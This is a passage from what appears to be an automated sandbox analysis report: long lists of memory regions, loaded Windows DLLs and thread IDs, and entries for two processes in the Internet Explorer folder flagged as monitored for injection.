"c:\\windows\\syswow64\\vaultcli.dll") Region: id = 2041 start_va = 0x6bb10000 end_va = 0x6bd27fff monitored = 0 entry_point = 0x6bbb97b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 2042 start_va = 0x6bd30000 end_va = 0x6bd9ffff monitored = 0 entry_point = 0x6bd69e70 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\SysWOW64\\directmanipulation.dll" (normalized: "c:\\windows\\syswow64\\directmanipulation.dll") Region: id = 2043 start_va = 0x6bda0000 end_va = 0x6be19fff monitored = 0 entry_point = 0x6bdb5770 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\SysWOW64\\ieui.dll" (normalized: "c:\\windows\\syswow64\\ieui.dll") Region: id = 2044 start_va = 0x6be20000 end_va = 0x6c1a7fff monitored = 0 entry_point = 0x6bfcfd70 region_type = mapped_file name = "jscript9.dll" filename = "\\Windows\\SysWOW64\\jscript9.dll" (normalized: "c:\\windows\\syswow64\\jscript9.dll") Region: id = 2045 start_va = 0x6c1b0000 end_va = 0x6c1fcfff monitored = 0 entry_point = 0x6c1c58f0 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\SysWOW64\\ninput.dll" (normalized: "c:\\windows\\syswow64\\ninput.dll") Region: id = 2046 start_va = 0x6d3c0000 end_va = 0x6d3ecfff monitored = 0 entry_point = 0x6d3d2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 2047 start_va = 0x6d3f0000 end_va = 0x6d496fff monitored = 0 entry_point = 0x6d426240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 2048 start_va = 0x6d4a0000 end_va = 0x6d690fff monitored = 0 entry_point = 0x6d583cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 2049 start_va = 0x6d6a0000 end_va = 0x6d81afff monitored = 0 entry_point = 0x6d6eec50 region_type = mapped_file name = "ieapfltr.dll" filename = "\\Windows\\SysWOW64\\ieapfltr.dll" (normalized: "c:\\windows\\syswow64\\ieapfltr.dll") Region: id = 2050 start_va = 0x6d820000 end_va = 0x6d86efff monitored = 0 entry_point = 0x6d859000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\SysWOW64\\ieproxy.dll" (normalized: "c:\\windows\\syswow64\\ieproxy.dll") Region: id = 2051 start_va = 0x6d870000 end_va = 0x6dcfdfff monitored = 0 entry_point = 0x6dbfa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 2052 start_va = 0x6dd20000 end_va = 0x6dd29fff monitored = 0 entry_point = 0x6dd23200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2053 start_va = 0x6dd30000 end_va = 0x6dd3dfff monitored = 0 entry_point = 0x6dd33f60 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 2054 start_va = 0x6dd40000 end_va = 0x6dd5bfff monitored = 0 entry_point = 0x6dd52a90 region_type = mapped_file name = "srpapi.dll" filename = "\\Windows\\SysWOW64\\srpapi.dll" (normalized: "c:\\windows\\syswow64\\srpapi.dll") Region: id = 2055 start_va = 0x6dd60000 end_va = 0x6dda0fff monitored = 0 entry_point = 0x6dd67fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 2056 start_va = 0x6de00000 end_va = 0x6f181fff monitored = 0 entry_point = 0x6e1e0ec0 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 2057 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2058 start_va = 0x6f1b0000 end_va = 0x6f204fff monitored = 0 entry_point = 0x6f1d3150 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll") Region: id = 2059 start_va = 0x6f210000 end_va = 0x6fda8fff monitored = 0 entry_point = 0x6f3e6970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 2060 start_va = 0x6ffd0000 end_va = 0x6ffdafff monitored = 0 entry_point = 0x6ffd1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 2061 start_va = 0x6ffe0000 end_va = 0x701eefff monitored = 0 entry_point = 0x7008b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2062 start_va = 0x704a0000 end_va = 0x704cefff monitored = 0 entry_point = 0x704b95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2063 start_va = 0x704d0000 end_va = 0x704e2fff monitored = 0 entry_point = 0x704d9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2064 start_va = 0x704f0000 end_va = 0x704f7fff monitored = 0 entry_point = 0x704f1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 2065 start_va = 0x70500000 end_va = 0x70519fff monitored = 0 entry_point = 0x7050fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 2066 start_va = 0x70520000 end_va = 0x7054bfff monitored = 0 entry_point = 0x7053bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 2067 start_va = 0x70550000 end_va = 0x7056ffff monitored = 0 entry_point = 0x7055d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2068 start_va = 0x70570000 end_va = 0x7057ffff monitored = 0 entry_point = 0x70574600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 2069 start_va = 0x70580000 end_va = 0x705e3fff monitored = 0 entry_point = 0x7059afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 2070 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2071 start_va = 0x70750000 end_va = 0x70757fff monitored = 0 entry_point = 0x70751fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2072 start_va = 0x70760000 end_va = 0x707fafff monitored = 0 entry_point = 0x7079f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2073 start_va = 0x70800000 end_va = 0x70811fff monitored = 0 entry_point = 0x70804510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 2074 start_va = 0x70820000 end_va = 0x7082afff monitored = 0 entry_point = 0x70824a50 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\SysWOW64\\tokenbinding.dll" (normalized: "c:\\windows\\syswow64\\tokenbinding.dll") Region: id = 2075 start_va = 0x70830000 end_va = 0x70a3cfff monitored = 0 entry_point = 0x7091acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2076 start_va = 0x70a40000 end_va = 0x70bbdfff monitored = 0 entry_point = 0x70abc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2077 start_va = 0x71fe0000 end_va = 0x72026fff monitored = 0 entry_point = 0x71ff58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2078 start_va = 0x72030000 end_va = 0x72037fff monitored = 0 entry_point = 0x72031920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2079 start_va = 0x72040000 end_va = 0x7206efff monitored = 0 entry_point = 0x7204bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2080 start_va = 0x72070000 end_va = 0x720f3fff monitored = 0 entry_point = 0x72096530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2081 start_va = 0x72100000 end_va = 0x7214efff monitored = 0 entry_point = 0x7210d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2082 start_va = 0x72180000 end_va = 0x7244afff monitored = 0 entry_point = 0x723bc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2083 start_va = 0x724c0000 end_va = 0x724ebfff monitored = 0 entry_point = 0x724d5ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 2084 start_va = 0x72520000 end_va = 0x725a2fff monitored = 0 entry_point = 0x725437c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 2085 start_va = 0x725b0000 end_va = 0x726fafff monitored = 0 entry_point = 0x72611660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2086 start_va = 0x72760000 end_va = 0x72979fff monitored = 0 entry_point = 0x727f5550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 2087 start_va = 0x73f00000 end_va = 0x7411bfff monitored = 0 entry_point = 0x740cbc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 2088 start_va = 0x741f0000 end_va = 0x742b7fff monitored = 0 entry_point = 0x7425ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 2089 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2090 start_va = 0x742e0000 end_va = 0x743acfff monitored = 0 entry_point = 0x743329c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 2091 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2092 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2093 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2094 start_va = 0x74640000 end_va = 0x7464dfff monitored = 0 entry_point = 0x74645410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2095 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2096 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2097 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2098 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2099 start_va = 0x749d0000 end_va = 0x74b47fff monitored = 0 entry_point = 0x74a28a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2100 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2101 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2102 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2103 start_va = 0x75250000 end_va = 0x75256fff monitored = 0 entry_point = 0x75251e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2104 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2105 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2106 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2107 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2108 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2109 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2110 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2111 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2112 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2113 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2114 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2115 start_va = 0x76010000 end_va = 0x76022fff monitored = 0 entry_point = 0x76011d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2116 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2117 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2118 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2119 start_va = 0x76270000 end_va = 0x76361fff monitored = 0 entry_point = 0x762a8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 2120 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2121 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2122 start_va = 0x777c0000 end_va = 0x7781dfff monitored = 0 entry_point = 0x777d7470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 2123 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2124 start_va = 0x778a0000 end_va = 0x778e1fff monitored = 0 entry_point = 0x778b6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 2125 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2126 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2129 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2130 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2131 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2132 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 267 os_tid = 0x794 Thread: id = 268 os_tid = 0x13f4 Thread: id = 269 os_tid = 0x424 Thread: id = 270 os_tid = 0x31c Thread: id = 271 os_tid = 0x324 Thread: id = 272 os_tid = 0x504 Thread: id = 273 os_tid = 0x13c8 Thread: id = 274 os_tid = 0xf24 Thread: id = 275 os_tid = 0x448 Thread: id = 276 os_tid = 0x704 Thread: id = 277 os_tid = 0xf10 Thread: id = 278 os_tid = 0x988 Thread: id = 279 os_tid = 0x13e8 Thread: id = 280 os_tid = 0x13b0 Thread: id = 281 os_tid = 0x13a4 Thread: id = 282 os_tid = 0x1358 Thread: id = 283 os_tid = 0x1354 Thread: id = 284 os_tid = 0x11f8 Thread: id = 285 os_tid = 0x11f4 Thread: id = 286 os_tid = 0x4d8 Process: id = "73" image_name = "spgagentservice.exe" filename = "c:\\program files (x86)\\internet explorer\\spgagentservice.exe" page_root = "0x1b954000" os_pid = "0x132c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\spgagentservice.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 287 os_tid = 0x1340 Thread: id = 288 os_tid = 0x1330 Process: id = "74" image_name = "drive_law.exe" filename = "c:\\program files (x86)\\internet explorer\\drive_law.exe" page_root = "0x78f51000" os_pid = "0x1370" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\drive_law.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2457 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2458 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2459 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2460 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2461 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2462 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2463 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2464 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2465 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2466 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2467 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2468 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2469 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2470 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2471 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2472 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2473 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2474 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 2475 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2476 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2477 start_va = 0x8e0000 end_va = 0x99bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" 